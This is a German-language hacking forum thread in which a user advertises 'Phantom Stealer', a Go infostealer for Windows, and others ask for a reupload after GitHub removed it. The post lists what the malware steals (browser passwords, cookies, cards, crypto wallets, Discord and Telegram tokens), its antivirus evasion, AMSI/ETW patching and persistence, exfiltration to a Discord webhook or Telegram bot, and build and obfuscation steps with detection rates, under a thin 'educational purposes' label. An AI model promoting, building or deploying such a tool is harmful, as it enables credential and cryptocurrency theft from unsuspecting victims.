Jump to content

Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord)


  • Reply to this topic
  • Start new topic

Recommended Posts

Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord)

 

PHANTOM STEALER
Open Source Golang Infostealer - Full Source Code


What is this?
Full source code for a Windows infostealer written in Go. Grabs browser passwords, cookies, crypto wallets, Discord tokens, and more. Sends everything to Discord webhook or Telegram bot.

Built this as a learning project, figured I'd release it for anyone who wants to learn or use it for research.


Features:

Browser Stealer - Chrome, Edge, Brave, Opera, Firefox + more
- Passwords (DPAPI + AES-GCM decryption)
- Cookies
- Credit cards
- Autofill
- History

Crypto Wallet Stealer - 40+ wallets
- Desktop: Exodus, Electrum, Atomic, Bitcoin Core, etc
- Extensions: MetaMask, Phantom, Trust, Coinbase, Ronin, etc

Token Grabber
- Discord tokens (including encrypted)
- Telegram sessions (tdata)
- Steam (SSFN + config)

System Info
- Screenshot
- Clipboard
- WiFi passwords
- Hardware specs
- Installed software
- Running processes

Evasion
- VM detection
- Debugger detection
- AMSI/ETW patching
- Defender exclusion

Persistence (optional)
- Registry
- Startup folder
- Scheduled task
- WMI subscription

Exfil
- Discord webhook
- Telegram bot
- Zipped and organized


Setup:
1. Edit config/config.go with your webhook/bot token
2. Build: go build -ldflags "-s -w -H windowsgui" -o stub.exe .
3. Optional: Use garble for obfuscation
4. Run and check your webhook


Download:
github.com/1rhino2/phantom-stealer


Scans:
Clean build: ~5-10/70 on VT (expected for any stealer)
With garble: lower detection


Credits:
Solo project, built from scratch. No copy paste.

Note:
For educational purposes. Don't be stupid with it.

 

Virusscan und VM ist euere Freung!

8175AB38-2006-4BC6-8177-0048747920A1.jpeg.834aa5e60d526ebc5f8f43df4c7086a9.jpeg

Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs!
SESSION: 

051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552

Threema

HUZWDPY3

 

6 hours ago, BullDDoser said:

Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord)

 

PHANTOM STEALER
Open Source Golang Infostealer - Full Source Code


What is this?
Full source code for a Windows infostealer written in Go. Grabs browser passwords, cookies, crypto wallets, Discord tokens, and more. Sends everything to Discord webhook or Telegram bot.

Built this as a learning project, figured I'd release it for anyone who wants to learn or use it for research.


Features:

Browser Stealer - Chrome, Edge, Brave, Opera, Firefox + more
- Passwords (DPAPI + AES-GCM decryption)
- Cookies
- Credit cards
- Autofill
- History

Crypto Wallet Stealer - 40+ wallets
- Desktop: Exodus, Electrum, Atomic, Bitcoin Core, etc
- Extensions: MetaMask, Phantom, Trust, Coinbase, Ronin, etc

Token Grabber
- Discord tokens (including encrypted)
- Telegram sessions (tdata)
- Steam (SSFN + config)

System Info
- Screenshot
- Clipboard
- WiFi passwords
- Hardware specs
- Installed software
- Running processes

Evasion
- VM detection
- Debugger detection
- AMSI/ETW patching
- Defender exclusion

Persistence (optional)
- Registry
- Startup folder
- Scheduled task
- WMI subscription

Exfil
- Discord webhook
- Telegram bot
- Zipped and organized


Setup:
1. Edit config/config.go with your webhook/bot token
2. Build: go build -ldflags "-s -w -H windowsgui" -o stub.exe .
3. Optional: Use garble for obfuscation
4. Run and check your webhook


Download:
github.com/1rhino2/phantom-stealer


Scans:
Clean build: ~5-10/70 on VT (expected for any stealer)
With garble: lower detection


Credits:
Solo project, built from scratch. No copy paste.

Note:
For educational purposes. Don't be stupid with it.

 

Virusscan und VM ist euere Freung!

nice wollte mich schon lange wieder mit malware und rats beschaeftigen auch nur aus interesse danke 

  • 1 month later...
  • 1 month later...
On 27.3.2026 at 14:30, BullDDoser said:

Phantom Stealer - Open Source Golang Infostealer (Browser/Crypto/Discord)

 

PHANTOM STEALER
Open Source Golang Infostealer - Full Source Code


What is this?
Full source code for a Windows infostealer written in Go. Grabs browser passwords, cookies, crypto wallets, Discord tokens, and more. Sends everything to Discord webhook or Telegram bot.

Built this as a learning project, figured I'd release it for anyone who wants to learn or use it for research.


Features:

Browser Stealer - Chrome, Edge, Brave, Opera, Firefox + more
- Passwords (DPAPI + AES-GCM decryption)
- Cookies
- Credit cards
- Autofill
- History

Crypto Wallet Stealer - 40+ wallets
- Desktop: Exodus, Electrum, Atomic, Bitcoin Core, etc
- Extensions: MetaMask, Phantom, Trust, Coinbase, Ronin, etc

Token Grabber
- Discord tokens (including encrypted)
- Telegram sessions (tdata)
- Steam (SSFN + config)

System Info
- Screenshot
- Clipboard
- WiFi passwords
- Hardware specs
- Installed software
- Running processes

Evasion
- VM detection
- Debugger detection
- AMSI/ETW patching
- Defender exclusion

Persistence (optional)
- Registry
- Startup folder
- Scheduled task
- WMI subscription

Exfil
- Discord webhook
- Telegram bot
- Zipped and organized


Setup:
1. Edit config/config.go with your webhook/bot token
2. Build: go build -ldflags "-s -w -H windowsgui" -o stub.exe .
3. Optional: Use garble for obfuscation
4. Run and check your webhook


Download:
github.com/1rhino2/phantom-stealer


Scans:
Clean build: ~5-10/70 on VT (expected for any stealer)
With garble: lower detection


Credits:
Solo project, built from scratch. No copy paste.

Note:
For educational purposes. Don't be stupid with it.

 

Virusscan und VM ist euere Freung!

leider nicht mehr online:classic_unsure:

2 hours ago, MajinBuu said:

leider nicht mehr online:classic_unsure:

Wird seinen Grund gehabt haben warun Github die Software gelöscht hat.

Den Grund kann ich dir nicht nennen.

Sorry Amigo

8175AB38-2006-4BC6-8177-0048747920A1.jpeg.834aa5e60d526ebc5f8f43df4c7086a9.jpeg

Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs!
SESSION: 

051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552

Threema

HUZWDPY3

 

  • 2 weeks later...
On 14.7.2026 at 15:51, BullDDoser said:

Wird seinen Grund gehabt haben warun Github die Software gelöscht hat.

Den Grund kann ich dir nicht nennen.

Sorry Amigo

könntest die github datei auf pastebin hochladen? wäre echt top ! schade dass so schnell gelöscht wurde,,... Auf archive.org  lohnt sich nachzusehn?

6 minutes ago, EL DRuff said:

könntest die github datei auf pastebin hochladen? wäre echt top ! schade dass so schnell gelöscht wurde,,... Auf archive.org  lohnt sich nachzusehn?

Hab sie leider nicht gespeichert:classic_wacko:

Sorry @ EL DRuff

LG

Bulli

8175AB38-2006-4BC6-8177-0048747920A1.jpeg.834aa5e60d526ebc5f8f43df4c7086a9.jpeg

Ich bin nur in einem unter den Namen BullDDoSer a.k.a. Bulli unterwegs!
SESSION: 

051579b82cbe395805a79580cbabd86eab1365561b8805703f31cd9b96997c8552

Threema

HUZWDPY3

 

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...